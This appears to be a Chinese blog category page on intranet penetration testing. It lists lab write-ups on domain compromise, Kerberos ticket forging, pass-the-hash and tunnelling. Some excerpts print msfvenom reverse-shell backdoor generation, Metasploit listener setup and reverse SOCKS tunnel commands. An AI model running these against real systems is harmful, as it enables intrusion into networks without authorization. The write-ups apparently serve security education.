内网安全
文章平均质量分 64
划水的小白白
永远热爱,永远热泪盈眶
展开
-
内网渗透思路10之SPN拿下域控
站库分离、外网打点 、过杀软、多层网络渗透、横向渗透、jwt token密钥破解、phpmyadmin写shell、sqlserver 提权、SPN服务的利用、权限提升、域渗透原创 2021-10-31 20:30:43 · 1672 阅读 · 1 评论 -
内网渗透思路09之突破多层防护拿下域控
4.1 测试外网Linux服务器4.1.1 确认目标使用CMS版本信息4.1.2 测试CMS思路4.1.3 目录扫描找到备份文件4.1.4 登录后台拿shell4.1.5 bypass 宝塔disable_functions 执行命令4.1.6 信息收集密钥登录ssh4.1.7 docker本地导入镜像文件提权root4.1.8 openssl生成密文修改passwd获取root权限4.2 测试外网win服务器4.2.1 安装nmap扫描内网WEB服务器4.2.2 jspxcms 后台原创 2021-06-01 17:43:28 · 1972 阅读 · 6 评论 -
内网渗透思路08之常规外网打点拿下域控
这是一个完整的内网域渗透测试实例,从外网打到内网域控,使用技巧包括但不局限于,子域名碰撞测试 python编写渗透工具 用metasploit获取域控的ntml 明文 凭据 定位域控 制作白银票据 制作黄金票据 跨路由渗透 内网横行渗透 域控权限维持 cobaltscritke渗透内网域控等多种域渗透技巧。原创 2021-05-24 16:46:25 · 3663 阅读 · 4 评论 -
内网渗透思路07之对Linux内网环境进行渗透
质量超高的linux外网到内网渗透测试实例从信息收集->代码审计->漏洞利用->服务器提权->隧道应用->目标权限。使用工具技巧包括单不限于,gobuster高级用法、高级代码审计 bypass_disablefunc 、解决交互shell乱码、linux多种提权、scock5穿透内网、隧道应用、浏览器代理。原创 2021-05-22 12:11:29 · 4449 阅读 · 11 评论 -
内网渗透思路06之一次完整的渗透测试
高质量的多网段的渗透测试完整实例,对三层网段的目标进行检测。从信息收集->漏洞测试->源代码审计->工具编写->逆向密文->服务器提权->隧道应用->目标获取,使用工具包括单不限于,masscan、nmap、wfuzz、中国蚁剑、ILSpy、burpsuite、 gobuster、vs2012、metasploit、sockscap、proxychains3.原创 2021-05-19 22:51:13 · 1520 阅读 · 6 评论 -
内网渗透思路05之一次完整的域渗透
7.1 拿到内网中一台机器的权限(一般是低权限)。7.2 提取当前机器,但是失败7.3 横向扫描内网其他机器存活7.4 对存活机器进行常用端口探测7.5 爆破mysql7.6 通过数据库直接提权拿下内网中另一个机器7.7 通过新的机器收集域中的一些信息,获取到域控的明文账户密码7.8 先通过msf获取到域控的会话,在找个合适的机会登录域控7.9 增加内网路由,配置socks代理7.10 远程桌面登录域控7.11 一些其他补充原创 2021-03-07 12:30:35 · 1961 阅读 · 3 评论 -
内网渗透思路04之常见的内网渗透测试
4.1 拿到内网中一台机器的权限(一般是低权限)。 4.2 尝试提权到administrator或者system。 4.3 读取此服务器的账户密码 4.4 开启此机器的远程连接 //实战中可以没有这一步,看具体情况 4.5 扫描检测内网之中其他机器 4.6 使用msf将攻击机器增加到目标网络的路由内,并开启socks代理 4.7 使用hash传递进行内网横向移动攻击 4.8提取新机器hash 4.9 通过在线网站解密新机器的hash值原创 2021-03-07 11:18:34 · 1326 阅读 · 0 评论 -
内网渗透思路03之跨路由扫描
生成metasploit后门msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.196 lport=12345 -f exe >/var/www/html/s.exekali监听use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 192.168.0.196set lport 12345exploit.原创 2021-03-07 10:35:05 · 892 阅读 · 0 评论 -
内网渗透思路02隧道技术之socket隧道
Socket的下载安装下载地址:http://sourceforge.net/projects/ssocks/受害者Linux服务器与攻击者的kali机器都需要下载socket文件(因为都不自带)下载之后,cd进入socket目录,使用下面命令进行编译并生成一个文件:./configure && make反向连接攻击机器kali开启监听Cd到socket下src目录./rcsocks -l 1088 -p 1080 -vv//等待远程Socks5服务器访问本地1080原创 2021-03-06 18:12:03 · 1075 阅读 · 0 评论 -
内网渗透思路01之MeTasploit来实现端口转发与端口映射
小说明:攻击者拿下“ 2008服务器 ”,不能直接访问内网中的“ 数据服务器 ”生成metasploit后门msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.115 lport=12345 -f exe >/var/www/html/ss.exe将木马文件上传至受害者机器攻击者Kali开启监听use exploit/multi/handlerset payload windows/meterpreter/.原创 2021-03-06 18:03:46 · 537 阅读 · 0 评论